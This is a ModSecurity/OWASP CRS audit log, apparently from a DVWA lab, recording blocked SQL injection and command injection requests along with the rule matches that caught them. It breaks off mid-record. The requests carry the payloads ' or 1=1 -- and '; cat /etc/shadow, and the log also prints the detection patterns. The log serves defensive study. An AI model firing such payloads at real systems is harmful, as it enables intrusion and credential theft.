{"transaction":{"time":"13/May/2017:09:56:35 --0400","transaction_id":"WRcQk38AAQEAAAkW4RcAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":389,"p2":2202,"p3":0,"p4":0,"p5":118,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:38 --0400","transaction_id":"WRcQln8AAQEAAAkW4RgAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2135,"p3":0,"p4":0,"p5":120,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:33 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@IAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@IAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":718,"p2":2422,"p3":193,"p4":541,"p5":84,"sr":29,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:34 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@MAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@MAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":627,"p2":1526,"p3":80,"p4":371,"p5":76,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:44 --0400","transaction_id":"WRcQ2H8AAQEAAAkYuEYAAAAD","remote_address":"192.168.75.130","remote_port":46234,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag 